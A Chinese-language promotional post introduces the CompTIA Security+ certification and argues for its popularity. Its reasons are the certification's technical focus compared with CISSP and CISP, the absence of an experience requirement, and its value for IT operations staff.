      牛妹先给大家介绍一下Security+

        Security+ 认证是一种中立第三方认证，其发证机构为美国计算机行业协会CompTIA ；是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一，和CISSP偏重信息安全管理相比，Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全，合规性和操作安全，威胁和漏洞，应用程序、数据和主机安全，访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易，含金量较高，目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因？  

       原因一：在所有信息安全认证当中，偏重信息安全技术的认证是空白的， Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP，但是无论CISP还是CISSP都是偏重信息安全管理的，技术知识讲的宽泛且浅显，考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上，CISP也要求大专学历4年以上工作经验，这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中，无论是找工作还是升职加薪，或是投标时候报人员，认证都是必不可少的，这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍，由于Security+偏重信息安全技术，所以对工作经验没有特别的要求。只要你有IT相关背景，追求进步就可以学习和考试。

       原因二： IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业，IT运维人员非常多，IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍，死亦写代码”的悲壮，但也有着“锄禾日当午，不如运维苦“的感慨。天天对着电脑和机器，时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识，掌握网络安全实践。职业发展朝着网络安全的方向发展，解决国内信息安全人才的匮乏问题。另外，即使不转型，要做好运维工作，学习安全知识取得安全认证也是必不可少的。

        原因三：接地气、国际范儿、考试方便、费用适中！

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下，人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的，相信Security+认证一定会成为最火爆的信息安全认证。